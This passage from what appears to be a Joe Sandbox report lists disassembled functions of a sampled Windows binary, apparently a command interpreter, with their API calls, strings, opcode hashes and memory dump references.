Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
String ID: :$\
API String ID: 3961617410-1166558509
Opcode ID: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
Instruction ID: d3ff6dc3357a73d4ed57d1cd261529ffa01aea829d060687e6acc884722e1f59
Opcode Fuzzy Hash: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
Instruction Fuzzy Hash: B921A422A1C682C6EF544B65A446079B6B1FF89BD8B4C853DEA1FE3794DF3CD448C680

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F77AA0 Relevance: 15.2, APIs: 10, Instructions: 221COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F77B13
GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F77B5F
CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F77B83
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F77BA9

Part of subcall function 00007FF683F8291C: GetDriveTypeW.KERNELBASE ref: 00007FF683F8294A

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: CreateDirectoryDriveFullNamePathTypememset
String ID:
API String ID: 1397130798-0
Opcode ID: 53223a99652f8e81a4eeb04428d23ca491e991d1bc8129b69f2a7ec7696704bc
Instruction ID: cca324c5e3792fea237cd6d39f08a038b69a48f037269ceab5603eea2db6cd19
Opcode Fuzzy Hash: 53223a99652f8e81a4eeb04428d23ca491e991d1bc8129b69f2a7ec7696704bc
Instruction Fuzzy Hash: 7C91C522B19B82C6EF699B1298426B973B1FF48B84F4C8139DA4DA7794DF3CD544C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F8258C Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF683F806C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF683F7B4DB), ref: 00007FF683F806D6
Part of subcall function 00007FF683F806C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF683F7B4DB), ref: 00007FF683F806F0
Part of subcall function 00007FF683F806C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF683F7B4DB), ref: 00007FF683F8074D
Part of subcall function 00007FF683F806C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF683F7B4DB), ref: 00007FF683F80762

_wcsicmp.MSVCRT ref: 00007FF683F825CA
_wcsicmp.MSVCRT ref: 00007FF683F825E8
_wcsicmp.MSVCRT ref: 00007FF683F8260F
_wcsicmp.MSVCRT ref: 00007FF683F82636
_wcsicmp.MSVCRT ref: 00007FF683F82650

Strings

CMDEXTVERSION, xrefs: 00007FF683F82608
EXIST, xrefs: 00007FF683F825E1
ERRORLEVEL, xrefs: 00007FF683F825C3
DEFINED, xrefs: 00007FF683F8262F
NOT, xrefs: 00007FF683F82649

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: _wcsicmp$Heap$AllocProcess
String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
API String ID: 3407644289-1668778490
Opcode ID: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
Instruction ID: 047ccb9f3ba4f7946f5bd88d0d0d53811c336c768314919632d6c8f2c8e7661b
Opcode Fuzzy Hash: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
Instruction Fuzzy Hash: B6313B21A58542D6FB186F22E8132796AA5BF84B85F4C803DDA0EE72A5DE3CE400C791

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683FA0C90 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 282COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF683FA1398: free.MSVCRT(?,?,00000000,00007FF683F97FE0,?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000), ref: 00007FF683FA13C2
Part of subcall function 00007FF683FA1398: free.MSVCRT(?,?,00000000,00007FF683F97FE0,?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000), ref: 00007FF683FA13DF

Part of subcall function 00007FF683F72730: towupper.MSVCRT ref: 00007FF683F727C1

Part of subcall function 00007FF683F791C0: memset.MSVCRT ref: 00007FF683F7921C
Part of subcall function 00007FF683F791C0: wcsrchr.MSVCRT ref: 00007FF683F792D8
Part of subcall function 00007FF683F791C0: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F79362
Part of subcall function 00007FF683F791C0: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F79373

Part of subcall function 00007FF683F78DF8: memset.MSVCRT ref: 00007FF683F78E6D
Part of subcall function 00007FF683F78DF8: memset.MSVCRT ref: 00007FF683F78E93

Part of subcall function 00007FF683F87854: memset.MSVCRT ref: 00007FF683F8790B

qsort.MSVCRT ref: 00007FF683FA0DDF
wcschr.MSVCRT ref: 00007FF683FA0E40
calloc.MSVCRT ref: 00007FF683FA0EA2
calloc.MSVCRT ref: 00007FF683FA0F5A
wcschr.MSVCRT ref: 00007FF683FA0F9E
memmove.MSVCRT ref: 00007FF683FA1001
memmove.MSVCRT ref: 00007FF683FA1021

Strings

&()[]{}^=;!%'+,`~, xrefs: 00007FF683FA0E39, 00007FF683FA0F97

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
String ID: &()[]{}^=;!%'+,`~
API String ID: 2516562204-381716982
Opcode ID: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
Instruction ID: 5f6a269482cfa38189f8717527cd21082f09624e5c5f11681e003321126d6056
Opcode Fuzzy Hash: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
Instruction Fuzzy Hash: 89C1AE32A15692C6EB548F21E8412BE77A0FF44B98F485139EE8DA3BA4DF3CE451D740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F87E80 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF683F7D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F7D46E
Part of subcall function 00007FF683F7D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F7D485
Part of subcall function 00007FF683F7D3F0: wcschr.MSVCRT ref: 00007FF683F7D4EE
Part of subcall function 00007FF683F7D3F0: iswspace.MSVCRT ref: 00007FF683F7D54D
Part of subcall function 00007FF683F7D3F0: wcschr.MSVCRT ref: 00007FF683F7D569
Part of subcall function 00007FF683F7D3F0: wcschr.MSVCRT ref: 00007FF683F7D58C

iswspace.MSVCRT ref: 00007FF683F87EEE

Strings

A, xrefs: 00007FF683F901B6

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: wcschr$Heapiswspace$AllocProcess
String ID: A
API String ID: 3731854180-3554254475
Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
Instruction ID: e54813d2c211502b40295f161696bee3c13c370ffb5de08df696559928d56906
Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
Instruction Fuzzy Hash: D2A1A161909682C6EB649F12A842279B7A0FF45790F0C803DDA5DEB7A4DF3CE445CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F9A39C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 111libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF683F9A3EA
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF683F9A40C
ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF683F9A47B
ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF683F9A4D3
ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF683F9A508
ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF683F9A54A

Strings

NTDLL.DLL, xrefs: 00007FF683F9A3E1
NtQueryInformationProcess, xrefs: 00007FF683F9A402

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: MemoryProcessRead$AddressLibraryLoadProc
String ID: NTDLL.DLL$NtQueryInformationProcess
API String ID: 1580871199-2613899276
Opcode ID: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
Instruction ID: c64ca51fef7165130f7ef2a50999107b19cea55566a090f4710a5402b1004947
Opcode Fuzzy Hash: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
Instruction Fuzzy Hash: B8515D72A18B92C6EB108F15E80567977A4FF88B84F495139DE5EA3B94DF3CD401C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F77420 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 101fileCOMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 00007FF683F774A1
CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F774E8
_open_osfhandle.MSVCRT ref: 00007FF683F77509
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF683F94931

Strings

con, xrefs: 00007FF683F7748A

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
String ID: con
API String ID: 689241570-4257191772
Opcode ID: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
Instruction ID: 0a872ef22cf0cba9dd1f2b531a1ef2fb616100a22f75b6dca853bc2e6e66a035
Opcode Fuzzy Hash: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
Instruction Fuzzy Hash: 6E41B032A18A45C6E7109F15A445779BAA1FF89BA4F588339DE6DA33D0CF3CD849C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F9A58C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97memoryfileCOMMON

Download Yara Rule

APIs

CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F9A5DC

Part of subcall function 00007FF683F9A8D4: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F9A8F1

SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F9A62E
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F9A68B
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F9A6A0
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F9A6DE
RtlFreeHeap.NTDLL ref: 00007FF683F9A6F2
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF683F9A701

Strings

PE, xrefs: 00007FF683F9A65C

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
String ID: PE
API String ID: 2941894976-4258593460
Opcode ID: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
Instruction ID: 504b6e2fc539623956a727f8449b3b6670bdde3f01125f3f41df8c5d93a883c6
Opcode Fuzzy Hash: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
Instruction Fuzzy Hash: C8417221608692C6EF209F12E41227AB7A0FF89B95F484239DE9D93B95DF3CE445CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F80010 Relevance: 13.7, APIs: 9, Instructions: 163fileCOMMON

Download Yara Rule

APIs

SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF683F9849D,?,?,?,00007FF683F9F0C7), ref: 00007FF683F80045
AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF683F9F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF683F9E964), ref: 00007FF683F80071
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F80092
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF683F800A7
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F80148
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF683F80181

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: File$LockPointerShared$AcquireByteCharMultiReadReleaseWide
String ID:
API String ID: 734197835-0
Opcode ID: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
Instruction ID: 67352010dfd53f3bfddbfb439d1d40242d5d0202b03b94ca9cdcec32e1430962
Opcode Fuzzy Hash: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
Instruction Fuzzy Hash: D561A372E4CA93DAE7248B12A8067797AA1FF45B54F4C813ADD4EA3790DF7CA405C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F99B0C Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 261registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF683F99B77
RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF683F99CD2
wcsrchr.MSVCRT ref: 00007FF683F99D47
RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF683F99E38

Strings

%s=%s, xrefs: 00007FF683F99C81, 00007FF683F99E85
., xrefs: 00007FF683F99B96
\Shell\Open\Command, xrefs: 00007FF683F99B8F, 00007FF683F99DE6

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Enum$Openwcsrchr
String ID: %s=%s$.$\Shell\Open\Command
API String ID: 3402383852-1459555574
Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
Instruction ID: 5a11b5ae6cdb9a23b24527ff4de26ea65d51aa2c6102103f0173eabdbb451ee7
Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
Instruction Fuzzy Hash: 47A1E522A09782C2EE109F55D4522BB63A0FF85B94F894539DE4DA77D4EF7CE941C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F87610 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 228COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F8768B
memset.MSVCRT ref: 00007FF683F876B4

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F877F5
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F87815

Part of subcall function 00007FF683F88198: wcscmp.MSVCRT ref: 00007FF683F881EA
Part of subcall function 00007FF683F88198: wcscmp.MSVCRT ref: 00007FF683F881FD

Strings

%s, xrefs: 00007FF683F8FC14

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: memset$wcscmp
String ID: %s
API String ID: 243296809-3043279178
Opcode ID: b0ad3edef7fc64e03d81687a8a254aeebb6f4c69458638a3e2c38bf1209308ef
Instruction ID: 145a83e6acbfb293710449a7154fdc7ccb9ceaad9783c5e4f78e0cb515e639d1
Opcode Fuzzy Hash: b0ad3edef7fc64e03d81687a8a254aeebb6f4c69458638a3e2c38bf1209308ef
Instruction Fuzzy Hash: B8A17022749786D6EB69DB22D8423FD27A0FF48748F184139DA4D9B695DF3CE648C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F71F90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F72058

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

memset.MSVCRT ref: 00007FF683F720C1
GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF683F720D2
GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF683F72117
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F721DC

Strings

DIRCMD, xrefs: 00007FF683F720C9, 00007FF683F72109

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: memset$EnvironmentVariable
String ID: DIRCMD
API String ID: 1405722092-1465291664
Opcode ID: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
Instruction ID: 16ec7c5078970af83323107c90e85bd429a811d30046b516603b249a13a29b11
Opcode Fuzzy Hash: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
Instruction Fuzzy Hash: 4D812872A18BC2CAEB20CF61A8912ED37E5FB49748F144139DA8DA7B59DF38D245C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F799F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF683F7CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF683F7B9A1,?,?,?,?,00007FF683F7D81A), ref: 00007FF683F7CDA6
Part of subcall function 00007FF683F7CD90: RtlAllocateHeap.NTDLL(?,?,?,00007FF683F7B9A1,?,?,?,?,00007FF683F7D81A), ref: 00007FF683F7CDBD

wcschr.MSVCRT ref: 00007FF683F79A39

Part of subcall function 00007FF683F7DF60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00007FF683F7CEAA), ref: 00007FF683F7DFB8
Part of subcall function 00007FF683F7DF60: RtlFreeHeap.NTDLL ref: 00007FF683F7DFCC
Part of subcall function 00007FF683F7DF60: _setjmp.MSVCRT ref: 00007FF683F7E03E

wcschr.MSVCRT ref: 00007FF683F79AF0
wcschr.MSVCRT ref: 00007FF683F79B0F

Part of subcall function 00007FF683F796E8: memset.MSVCRT ref: 00007FF683F797B2
Part of subcall function 00007FF683F796E8: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F79880

_wcsupr.MSVCRT ref: 00007FF683F8B844
wcscmp.MSVCRT ref: 00007FF683F8B86D

Strings

FOR, xrefs: 00007FF683F8B863
IF, xrefs: 00007FF683F8B850

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Heap$wcschr$Process$AllocateFree_setjmp_wcsuprmemsetwcscmp
String ID: FOR$ IF
API String ID: 557945885-2924197646
Opcode ID: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
